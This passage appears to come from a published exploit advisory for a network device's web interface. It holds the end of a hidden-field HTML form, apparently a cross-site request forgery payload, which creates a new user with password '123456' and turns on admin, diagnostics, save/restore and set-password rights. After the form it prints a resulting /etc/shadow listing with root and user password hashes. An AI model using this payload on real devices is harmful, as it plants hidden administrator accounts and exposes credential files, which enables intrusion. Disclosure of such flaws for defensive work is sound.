type="hidden" name="fullname" value="ZSL" /> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="confirm" value="123456" /> <input type="hidden" name="acl.login" value="on" /> <input type="hidden" name="acl.admin" value="on" /> <input type="hidden" name="acl.diags" value="on" /> <input type="hidden" name="acl.saverestore" value="on" /> <input type="hidden" name="acl.setpassword" value="on" /> <input type="hidden" name="finish" value="Finish" /> <input type="hidden" name=".defaultname" value="finish" /> <input type="submit" value="Idemo" /> </form> </body> </html> Result /etc/shadow: root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh sshd:!!:100:65534::/home:/bin/false clamav:!!:103:65534::/home:/bin/false testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh